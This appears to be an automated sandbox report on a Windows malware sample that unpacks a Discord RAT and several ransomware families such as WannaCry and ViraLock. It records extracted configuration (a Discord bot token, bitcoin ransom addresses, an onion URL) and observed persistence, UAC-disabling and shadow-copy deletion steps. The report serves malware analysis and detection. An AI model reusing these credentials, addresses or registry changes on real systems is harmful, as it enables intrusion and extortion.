Resubmissions
03-02-2025 17:12
250203-vqyb9syqfp 1001-02-2025 09:56
250201-lysx3sxjhz 1001-02-2025 08:29
250201-kdnbesxlak 10Analysis
-
max time kernel
722s -
max time network
704s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
01-02-2025 09:56
Behavioral task
behavioral1
Sample
Client-built.exe
Resource
win11-20241007-en
General
-
Target
Client-built.exe
-
Size
78KB
-
MD5
c5fe943c63dffbd58b0f61b70ce570e3
-
SHA1
1e0385df0eeb6078a04607866cdd0adf47646521
-
SHA256
3fcfc7ed8a9fe616540b4e12926021b8ee515879f555a1e697961483bccb4fa5
-
SHA512
b961ccb840443f5eb78fefa5417e22796f6e0b7272788b8fcdc6abd57262a1c2b4357050171a70af2b0e5d30a1849b081020f3498ab07e50aacbf9f60c32114b
-
SSDEEP
1536:52WjO8XeEXFh5P7v88wbjNrfxCXhRoKV6+V+RPIC:5Zv5PDwbjNrmAE+BIC
Malware Config
Extracted
discordrat
-
discord_token
MTMzNDg2ODQ0OTQ4MjI0ODI1NA.GmvrOG.IWZ9BB6ZJ0i5ytcVVC-P4pzKCiMdbTruowhj90
-
server_id
1335159502953254943
Extracted
C:\Users\Admin\README_HOW_TO_UNLOCK.TXT
http://zvnvp2rhe3ljwf2m.onion
Extracted
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\!Please Read Me!.txt
wannacry
15zGqZCTcys6eCjDkE3DypCjXi6QWRV6V1
Extracted
C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master (1).zip\The-MALWARE-Repo-master\Ransomware\@[email protected]
wannacry
13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94
Signatures
-
Discord RAT
A RAT written in C# using Discord as a C2.
-
Discordrat family
-
Modifies WinLogon for persistence 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Program Files (x86)\\Windows\\Error file remover\\fatalerror.exe" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Program Files (x86)\\Windows\\Error file remover\\fatalerror.exe" msiexec.exe -
Modifies visibility of file extensions in Explorer 2 TTPs 17 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" reg.exe Set value (int) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" reg.exe -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6576 6092 cmd.exe 290 -
UAC bypass 3 TTPs 17 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Wannacry
WannaCry is a ransomware cryptoworm.
-
Wannacry family
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Renames multiple (58) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Renames multiple (73) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Drops startup file 10 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD433.tmp WannaCrypt0r.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD449.tmp WannaCrypt0r.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\README_HOW_TO_UNLOCK.TXT.WCRYT WannaCry.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\README_HOW_TO_UNLOCK.TXT.WCRY WannaCry.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SDFF57.tmp WannaCry.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\USFFB-11ZTZ-TXTXH-TOTOY.HTML SporaRansomware.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\README_HOW_TO_UNLOCK.TXT.WNCRYT WannaCrypt0r.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\README_HOW_TO_UNLOCK.TXT.WNCRY WannaCrypt0r.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\README_HOW_TO_UNLOCK.TXT WannaCrypt0r.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SDFF5E.tmp WannaCry.exe -
Executes dropped EXE 39 IoCs
pid Process 3116 WecUgIMY.exe 1296 JkckUkcM.exe 1476 ViraLock.exe 1460 ViraLock.exe 2600 ViraLock.exe 1596 ViraLock.exe 4812 ViraLock.exe 4232 !WannaDecryptor!.exe 2372 ViraLock.exe 5024 taskdl.exe 3204 ViraLock.exe 2112 ViraLock.exe 7124 ViraLock.exe 5684 ViraLock.exe 5728 ViraLock.exe 5456 ViraLock.exe 5564 ViraLock.exe 4652 ViraLock.exe 476 @[email protected] 7012 @[email protected] 4328 !WannaDecryptor!.exe 7152 !WannaDecryptor!.exe 6504 taskhsvc.exe 5324 !WannaDecryptor!.exe 2844 taskse.exe 676 @[email protected] 5184 taskdl.exe 2336 taskse.exe 6752 @[email protected] 2844 taskdl.exe 72 taskse.exe 5580 @[email protected] 5328 taskdl.exe 1176 taskse.exe 5408 @[email protected] 5188 taskdl.exe 7152 taskse.exe 7004 @[email protected] 5428 taskdl.exe -
Loads dropped DLL 24 IoCs
pid Process 4676 WinlockerVB6Blacksod.exe 4676 WinlockerVB6Blacksod.exe 3992 MsiExec.exe 3992 MsiExec.exe 3992 MsiExec.exe 3992 MsiExec.exe 3992 MsiExec.exe 3992 MsiExec.exe 3992 MsiExec.exe 3992 MsiExec.exe 3992 MsiExec.exe 3992 MsiExec.exe 5972 MsiExec.exe 3992 MsiExec.exe 4676 WinlockerVB6Blacksod.exe 3992 MsiExec.exe 6504 taskhsvc.exe 6504 taskhsvc.exe 6504 taskhsvc.exe 6504 taskhsvc.exe 6504 taskhsvc.exe 6504 taskhsvc.exe 6504 taskhsvc.exe 6504 taskhsvc.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 4804 icacls.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Run\WecUgIMY.exe = "C:\\Users\\Admin\\IisUcwYw\\WecUgIMY.exe" ViraLock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\JkckUkcM.exe = "C:\\ProgramData\\CwUwoUQU\\JkckUkcM.exe" ViraLock.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\JkckUkcM.exe = "C:\\ProgramData\\CwUwoUQU\\JkckUkcM.exe" JkckUkcM.exe Set value (str) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Software\Microsoft\Windows\CurrentVersion\Run\WecUgIMY.exe = "C:\\Users\\Admin\\IisUcwYw\\WecUgIMY.exe" WecUgIMY.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Update Task Scheduler = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Temp1_The-MALWARE-Repo-master (1).zip\\The-MALWARE-Repo-master\\Ransomware\\WannaCry.exe\" /r" WannaCry.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\qhvfvgsevfiqy755 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Temp1_The-MALWARE-Repo-master (1).zip\\The-MALWARE-Repo-master\\Ransomware\\tasksche.exe\"" reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 89 3992 MsiExec.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\B: WinlockerVB6Blacksod.exe File opened (read-only) \??\J: WinlockerVB6Blacksod.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\U: WinlockerVB6Blacksod.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\A: WinlockerVB6Blacksod.exe File opened (read-only) \??\G: WinlockerVB6Blacksod.exe File opened (read-only) \??\M: WinlockerVB6Blacksod.exe File opened (read-only) \??\V: WinlockerVB6Blacksod.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\I: WinlockerVB6Blacksod.exe File opened (read-only) \??\N: WinlockerVB6Blacksod.exe File opened (read-only) \??\Y: WinlockerVB6Blacksod.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: WinlockerVB6Blacksod.exe File opened (read-only) \??\S: WinlockerVB6Blacksod.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\E: WinlockerVB6Blacksod.exe File opened (read-only) \??\K: WinlockerVB6Blacksod.exe File opened (read-only) \??\T: WinlockerVB6Blacksod.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Q: WinlockerVB6Blacksod.exe File opened (read-only) \??\R: WinlockerVB6Blacksod.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\L: WinlockerVB6Blacksod.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\O: WinlockerVB6Blacksod.exe File opened (read-only) \??\X: WinlockerVB6Blacksod.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\H: WinlockerVB6Blacksod.exe File opened (read-only) \??\Z: WinlockerVB6Blacksod.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: WinlockerVB6Blacksod.exe File opened (read-only) \??\A: msiexec.exe -
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
Drops file in System32 directory 64 IoCs
description ioc Process File created C:\Windows\SysWOW64\ookk.exe WecUgIMY.exe File opened for modification C:\Windows\SysWOW64\BwIq.ico WecUgIMY.exe File opened for modification C:\Windows\SysWOW64\cYYc.ico WecUgIMY.exe File opened for modification C:\Windows\SysWOW64\qIMa.ico WecUgIMY.exe File opened for modification C:\Windows\SysWOW64\igIM.exe WecUgIMY.exe File opened for modification C:\Windows\SysWOW64\DIMW.ico WecUgIMY.exe File created C:\Windows\SysWOW64\gEAU.exe WecUgIMY.exe File created C:\Windows\SysWOW64\ksYa.exe WecUgIMY.exe File created C:\Windows\SysWOW64\QcQs.exe WecUgIMY.exe File opened for modification C:\Windows\SysWOW64\Uskk.exe WecUgIMY.exe File opened for modification C:\Windows\SysWOW64\SYEc.exe WecUgIMY.exe File created C:\Windows\SysWOW64\ukMw.exe WecUgIMY.exe File opened for modification C:\Windows\SysWOW64\DIcW.exe WecUgIMY.exe File opened for modification C:\Windows\SysWOW64\Sswq.ico WecUgIMY.exe File opened for modification C:\Windows\SysWOW64\nEAw.exe WecUgIMY.exe File created C:\Windows\SysWOW64\oQgC.exe WecUgIMY.exe File created C:\Windows\SysWOW64\dUcg.exe WecUgIMY.exe File opened for modification C:\Windows\SysWOW64\sEwI.ico WecUgIMY.exe File opened for modification C:\Windows\SysWOW64\qIEq.exe WecUgIMY.exe File created C:\Windows\SysWOW64\tMkS.exe WecUgIMY.exe File opened for modification C:\Windows\SysWOW64\jksS.exe WecUgIMY.exe File opened for modification C:\Windows\SysWOW64\ZsgI.ico WecUgIMY.exe File created C:\Windows\SysWOW64\rIMC.exe WecUgIMY.exe File opened for modification C:\Windows\SysWOW64\HIAI.exe WecUgIMY.exe File opened for modification C:\Windows\SysWOW64\tMkS.exe WecUgIMY.exe File opened for modification C:\Windows\SysWOW64\NQAW.exe WecUgIMY.exe File opened for modification C:\Windows\SysWOW64\MUEo.exe WecUgIMY.exe File opened for modification C:\Windows\SysWOW64\OsIG.ico WecUgIMY.exe File opened for modification C:\Windows\SysWOW64\KIMw.exe WecUgIMY.exe File opened for modification C:\Windows\SysWOW64\wgAC.exe WecUgIMY.exe File opened for modification C:\Windows\SysWOW64\FUIa.exe WecUgIMY.exe File created C:\Windows\SysWOW64\TcUG.exe WecUgIMY.exe File opened for modification C:\Windows\SysWOW64\iIYk.ico WecUgIMY.exe File opened for modification C:\Windows\SysWOW64\uosO.ico WecUgIMY.exe File created C:\Windows\SysWOW64\Uskk.exe WecUgIMY.exe File created C:\Windows\SysWOW64\ycUY.exe WecUgIMY.exe File created C:\Windows\SysWOW64\qIEq.exe WecUgIMY.exe File opened for modification C:\Windows\SysWOW64\vwUq.ico WecUgIMY.exe File opened for modification C:\Windows\SysWOW64\ZoUa.exe WecUgIMY.exe File created C:\Windows\SysWOW64\VoIA.exe WecUgIMY.exe File opened for modification C:\Windows\SysWOW64\oQgC.exe WecUgIMY.exe File opened for modification C:\Windows\SysWOW64\bQco.exe WecUgIMY.exe File opened for modification C:\Windows\SysWOW64\TUYa.exe WecUgIMY.exe File opened for modification C:\Windows\SysWOW64\zEYO.ico WecUgIMY.exe File opened for modification C:\Windows\SysWOW64\Ewsc.ico WecUgIMY.exe File opened for modification C:\Windows\SysWOW64\ggsO.exe WecUgIMY.exe File created C:\Windows\SysWOW64\BYQC.exe WecUgIMY.exe File created C:\Windows\SysWOW64\DIcW.exe WecUgIMY.exe File opened for modification C:\Windows\SysWOW64\yoEo.ico WecUgIMY.exe File opened for modification C:\Windows\SysWOW64\NUUY.exe WecUgIMY.exe File created C:\Windows\SysWOW64\dIEg.exe WecUgIMY.exe File opened for modification C:\Windows\SysWOW64\FAUq.exe WecUgIMY.exe File created C:\Windows\SysWOW64\ygAU.exe WecUgIMY.exe File opened for modification C:\Windows\SysWOW64\dUcg.exe WecUgIMY.exe File created C:\Windows\SysWOW64\cswO.exe WecUgIMY.exe File opened for modification C:\Windows\SysWOW64\RwkG.exe WecUgIMY.exe File created C:\Windows\SysWOW64\FUIa.exe WecUgIMY.exe File opened for modification C:\Windows\SysWOW64\swwY.ico WecUgIMY.exe File opened for modification C:\Windows\SysWOW64\BkYC.ico WecUgIMY.exe File created C:\Windows\SysWOW64\HIAI.exe WecUgIMY.exe File created C:\Windows\SysWOW64\SYEc.exe WecUgIMY.exe File opened for modification C:\Windows\SysWOW64\yIsc.exe WecUgIMY.exe File opened for modification C:\Windows\SysWOW64\uMUi.exe WecUgIMY.exe File created C:\Windows\SysWOW64\GUAA.exe WecUgIMY.exe -
Sets desktop wallpaper using registry 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" WannaCrypt0r.exe Set value (str) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\!WannaCryptor!.bmp" !WannaDecryptor!.exe Set value (str) \REGISTRY\USER\S-1-5-21-2410826464-2353372766-2364966905-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" @[email protected] -
resource yara_rule behavioral1/memory/1288-750-0x0000000000400000-0x000000000058D000-memory.dmp upx behavioral1/memory/1288-962-0x0000000000400000-0x000000000058D000-memory.dmp upx behavioral1/memory/6544-2237-0x0000000000400000-0x000000000044F000-memory.dmp upx behavioral1/memory/3500-2968-0x0000000000400000-0x0000000000438000-memory.dmp upx behavioral1/memory/3500-2973-0x0000000000400000-0x0000000000438000-memory.dmp upx -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files (x86)\Windows\Error file remover\fatalerror.exe msiexec.exe File created C:\Program Files (x86)\Windows\Error file remover\Windows Logoff Sound.wav msiexec.exe -
Drops file in Windows directory 25 IoCs
description ioc Process File created C:\Windows\SystemTemp\~DFE10F29D116D6B7E3.TMP msiexec.exe File created C:\Windows\Installer\SourceHash{C452D4E2-DE24-48B6-B5C3-ACB240A01606} msiexec.exe File opened for modification C:\Windows\Installer\MSI1DC4.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI12C3.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI163F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI199C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1BCF.tmp msiexec.exe File created C:\Windows\Tasks\sys.job MsiExec.exe File created C:\Windows\SystemTemp\~DF7F2577E22D3C9A99.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSIE1D.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI13AE.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI301A.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF4FBD72CB7F3CDF28.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI2D69.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI114B.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI1EA0.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI2085.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI2307.tmp msiexec.exe File created C:\Windows\Installer\e600cd5.msi msiexec.exe File opened for modification C:\Windows\Installer\e600cd5.msi msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\SystemTemp\~DFA28D0DB4E4FDBB05.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI2961.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 7040 6544 WerFault.exe 299 6964 3500 WerFault.exe 332 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Birele.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ViraLock.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskdl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ViraLock.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ViraLock.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iexplore.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ViraLock.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language @[email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ViraLock.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language @[email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskdl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe 